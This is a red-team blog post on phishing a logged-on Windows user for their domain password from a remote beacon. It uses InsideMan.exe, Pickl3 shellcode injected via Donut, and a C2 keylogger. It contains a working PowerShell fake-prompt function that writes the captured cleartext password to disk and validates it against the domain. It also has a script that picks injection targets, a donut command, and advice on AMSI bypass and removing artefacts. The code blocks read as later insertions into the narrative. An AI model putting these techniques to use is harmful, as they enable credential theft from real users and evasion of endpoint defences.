Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan

assume-breach
7 min read · Apr 12, 2022


Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or used whatever other method to get a shell back from a low-level workstation.

You run through all of your privilege escalation checks - unsecured objects, Windows Credential Manager dumping, unsecured services, PATH exploitation - and come up with a big ole goose egg.

Now what?

Why don’t we just ask the user what their password is?

All About Creds

Windows privilege escalation is one of the most important topics in pentesting, red teaming and defending our own systems. When you’re attacking a network, having regular domain credentials for a user is essential for running tools like BloodHound and exploits like NoPac or PrinterBug.

So we have our beacon; how can we ask the user for their password? The answer is actually pretty simple. Having finished the Sektor7 Windows Privilege Escalation course, I learned several cool techniques for escalating to higher-integrity shells.

One of the techniques taught in the course is called “A Thief,” which uses a PowerShell one-liner to spawn a Windows Security credential prompt.

This is great! It automatically enumerates the username and domain of the current user and pre-fills them in the prompt. What happens when I enter the password?

Cool! It prints the password in cleartext on the command prompt. So we should be all set, right? Not exactly.

What Are The Problems?

There are two problems with this. The first is that the one-liner was entered on the user’s console from a GUI session. We want to do this remotely. Let’s see if we can run the same one-liner from a Covenant beacon.

The screenshot is a little hard to read, but here’s the gist of the output: since the one-liner requires user input and the beacon’s PowerShell has no interactive host to draw the prompt on, the command fails. We can’t run a script that needs interactive input through the beacon this way (at least I didn’t find a way!).

There are ways around this. One is from a post way back in 2015 titled PowerShell Popups + Capture, which involves setting up a Metasploit listener and capturing the result. It works, but can’t we make it easier? Of course.

The second problem is that the one-liner only shows the cleartext credential on the victim user’s console. So in order to see it, we would need to be in the context of the user’s session.

Obviously, these are not the best scenarios for our internal Windows phishing attempt. Luckily, we have two methods we can use to get cleartext creds.

Method 1: InsideMan.exe

Shameless plug of my own tool aside, InsideMan.exe is an unsophisticated but easy way to prompt the user for their password. The program then writes the cleartext password to a text file in the user’s Documents directory.

The program is written in C++ and uses a system() call to launch a PowerShell session that runs a modified version of the one-liner from the Sektor7 course. You can find a precompiled InsideMan on my GitHub, or you can compile it yourself with gcc.
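The mechanics that both the course one-liner and InsideMan rely on, as an added PowerShell example that is not the course’s or InsideMan’s own code: a Windows Security prompt pre-filled with DOMAIN\user, the typed password read back in cleartext, and the result dropped to windows32.txt in the user’s Documents folder. The prompt text, the retry loop and the optional domain validation are my own additions and are assumptions, not something the original tool does.

```powershell
# Added example (not InsideMan's or the Sektor7 course's code). Must run inside the
# logged-on user's interactive session: Get-Credential needs a host that can draw the
# prompt, which a beacon's PowerShell runspace does not provide. The message text,
# retry loop and validation step are assumptions made for illustration.

function Test-DomainPassword {
    param([string]$UserName, [string]$Password)
    # Check the typed password against the domain so a typo is not mistaken for a win.
    # Each call is a real authentication against a DC (4776/4625 on failure), so keep
    # the number of attempts low. Throws on a non-domain-joined host.
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Domain')
    try { return $ctx.ValidateCredentials($UserName, $Password) }
    finally { $ctx.Dispose() }
}

function Invoke-CredentialPrompt {
    param(
        [string]$Message = 'Your session has expired. Enter your Windows password to continue.',
        [string]$OutFile = (Join-Path ([Environment]::GetFolderPath('MyDocuments')) 'windows32.txt'),
        [int]$MaxAttempts = 3,
        [switch]$Validate
    )
    # Same DOMAIN\user the one-liner enumerates; the user only has to type the password.
    $user = "$env:USERDOMAIN\$env:USERNAME"

    for ($attempt = 1; $attempt -le $MaxAttempts; $attempt++) {
        $cred = Get-Credential -UserName $user -Message $Message
        if ($null -eq $cred) { continue }                     # Cancel pressed: re-prompt
        $plain = $cred.GetNetworkCredential().Password        # cleartext, not the SecureString
        if ([string]::IsNullOrEmpty($plain)) { continue }
        if ($Validate -and -not (Test-DomainPassword -UserName $user -Password $plain)) { continue }

        # Same drop location InsideMan uses; 'type' it from the beacon, then delete it.
        Set-Content -Path $OutFile -Value "${user}:${plain}" -Encoding Ascii
        return $plain
    }
    return $null
}

# Usage from the user's session (for example from a hidden PowerShell process):
# Invoke-CredentialPrompt -Validate | Out-Null
```

The -Validate switch is the piece a practitioner will want most: without it, “you can run the EXE until you get the password” only tells you the user typed something, not that it was correct. The trade-off is that every validation is a logon attempt visible on the domain controller, so a re-prompt loop should stay short.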

We’ll assume that we have a beacon on our target. I’m going to use Covenant C2 for the demonstration. I have used the Upload task to drop InsideMan.exe to disk. As you can see, Windows Defender is on. I have used Covenant’s built-in AMSI bypass, but only to run PowerShell commands; InsideMan.exe itself is not flagged as malicious (yet).

So here’s the first problem with this method: you must drop an EXE to disk. Yeah, I know. OPSEC! I don’t like leaving artifacts on a system either, but it is what it is. Besides, we drop files to disk with our phishing payloads anyway!

Now we can run InsideMan from the beacon.

The user is prompted with a Windows credential message box.

Wendy enters her password at the prompt.

The windows32.txt file is created in Wendy’s Documents directory.

And we can type out the file to get her cleartext password!

This is a super simple way to prompt the user for their password. There is no process injection, no fancy Windows API calls, no unhooking. Just point and shoot. You can run the EXE as many times as needed until you get the password. Keep in mind that nothing checks what the user typed, so validate the credential (for example by authenticating with it) before you rely on it, and remember the text file is a second artifact to clean up.

So now let’s see a different method of prompting the user for a password. This one is going to be much more involved.

Method 2: Process Injection With Donut And Pickl3

This method uses a tool called Pickl3. Pickl3 is a C++ program that uses Windows API calls to pop a Windows credential window similar to InsideMan’s. And like the one-liner, Pickl3 only displays the cleartext password in the user’s session. So how do we get around this?

One way is process injection. We can convert Pickl3 into shellcode with Donut, inject it into a process via our beacon, and then use the keylogger function in Covenant or Cobalt Strike to catch the password as it’s typed into the prompt.

Compiling

You can compile Pickl3’s C++ file with Visual Studio. Create a new C++ console application, paste the code from the .cpp file into it, and build it from the Build menu to get your EXE.

Converting Pickl3 Into Shellcode

If you don’t have Donut, clone it from GitHub to your Windows machine. We’ll use the -b flag for its AMSI/WLDP bypass options.

Process Injection Part 1:

Back on our beacon, we run “ps” to list the active processes on the system.

Looking at the processes, we see svchost running. This is a good process to inject into, as long as it is an instance in the logged-on user’s interactive session: a service-account svchost in session 0 has no desktop, so a prompt injected there would never be shown.

The PID is 1680, so we’ll remember that and start our keylogger.

Keylogging

Covenant, Metasploit and Cobalt Strike all offer keylogging. For Covenant, we just type Keylogger at the prompt and are given a few timing options.

We can choose the 30 second interval.

Process Injection Part 2:

We need to bypass AMSI one more time before we inject.

We type our PID into the ProcessID field and click “Browse” to choose our shellcode.

We click “Execute” and on our victim machine, we see the password prompt.

We enter the password into the prompt and back on our beacon, we get the cleartext password.

When we strip the Shift and Enter key output, we get winter20!

Takeaways

These are both pretty good methods for getting cleartext passwords from a remote beacon. While dropping an EXE to disk is not the most OPSEC-safe technique, it works quickly without requiring any AV bypasses or EDR evasion. We can also delete the artifacts (the EXE and the text file) quickly after the password has been obtained.

Running the process in memory via injection is the better way to complete our goal, but it doesn’t come without its own issues. We have to run our keylogger, and I’ve found compatibility issues with machines that don’t have the Visual C++ runtime installed.

A system that doesn’t have these files installed returns an exception error. This is most likely the Visual C++ runtime (vcruntime140.dll, msvcp140.dll) that a default Visual Studio build links dynamically; setting Runtime Library to Multi-threaded (/MT) under C/C++ > Code Generation links it statically and removes the dependency.

I have also found that to get Pickl3 to work you must bypass AMSI right before you attempt the injection. Since InsideMan only uses PowerShell calls, we don’t need any of that.
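The pre-flight checks I would run through the beacon before injecting the Donut shellcode, covering the three things that break this method in practice: a target process outside the user’s session, a bitness mismatch between shellcode and target, and a missing Visual C++ runtime. This is an added PowerShell example, not Pickl3’s, Donut’s or Covenant’s code; the process names, DLL names and output layout are my own choices, and the IsWow64Process P/Invoke is the documented kernel32 API.

```powershell
# Added example (not Pickl3's, Donut's or Covenant's code). Run through the beacon's
# PowerShell on the target before injecting. Names and output layout are assumptions.

Add-Type -Namespace Native -Name Kernel32 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool IsWow64Process(System.IntPtr hProcess, out bool wow64);
'@

function Test-VcRuntimePresent {
    # A default Visual Studio build of Pickl3 links the VC++ runtime dynamically. If
    # these DLLs are absent the in-memory loader cannot resolve the imports and the
    # injected payload throws instead of showing a prompt.
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $missing = @('vcruntime140.dll', 'msvcp140.dll') |
        Where-Object { -not (Test-Path (Join-Path $sys32 $_)) }
    return [pscustomobject]@{ Present = ($missing.Count -eq 0); Missing = @($missing) }
}

function Get-ProcessBitness {
    param([System.Diagnostics.Process]$Process)
    # Donut shellcode built with -a 1 (x86) or -a 2 (amd64) must match the target;
    # -a 3 carries both. Returns 'x64', 'x86', or $null if we cannot open the process.
    if (-not [Environment]::Is64BitOperatingSystem) { return 'x86' }
    try {
        $wow = $false
        if (-not [Native.Kernel32]::IsWow64Process($Process.Handle, [ref]$wow)) { return $null }
        if ($wow) { return 'x86' } else { return 'x64' }
    } catch { return $null }
}

function Get-InjectionCandidates {
    param([string[]]$PreferredNames = @('svchost', 'explorer', 'RuntimeBroker'))
    # The prompt is drawn on the desktop of whichever session the host process belongs
    # to. Service-account svchost instances live in session 0, which has no interactive
    # desktop, so only processes in our own (the user's) session qualify.
    $mySession = (Get-Process -Id $PID).SessionId
    Get-Process |
        Where-Object { $_.SessionId -eq $mySession -and $_.SessionId -ne 0 -and
                       $PreferredNames -contains $_.ProcessName } |
        ForEach-Object {
            [pscustomobject]@{
                Id        = $_.Id
                Name      = $_.ProcessName
                SessionId = $_.SessionId
                Bitness   = Get-ProcessBitness -Process $_
            }
        }
}

# Usage from the beacon:
#   Test-VcRuntimePresent
#   Get-InjectionCandidates | Format-Table
# Then build the shellcode on the operator box to match the chosen target, e.g.
#   donut.exe -i Pickl3.exe -a 2 -b 3 -o pickl3.bin
# (check `donut -h`; older releases take the input file positionally instead of -i),
# and inject with the PID reported above, bypassing AMSI immediately beforehand.
```

If Test-VcRuntimePresent reports missing DLLs, rebuild Pickl3 with /MT rather than hoping the redistributable is installed; if Get-InjectionCandidates returns nothing, the beacon itself is probably running in session 0 and no injected prompt will ever reach the user’s screen.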

NOTE: I have reached out to the author of Pickl3 to see how he has compiled the tool to see if I can get more compatibility with it. I will update this article once I hear from him.

For more Red Team techniques and cool stuff, follow me here on Medium or on Twitter @assume_breach


Written by assume-breach

Security enthusiast that loves a good CTF! OSCP, CRTO, RHCSA, MCSA.
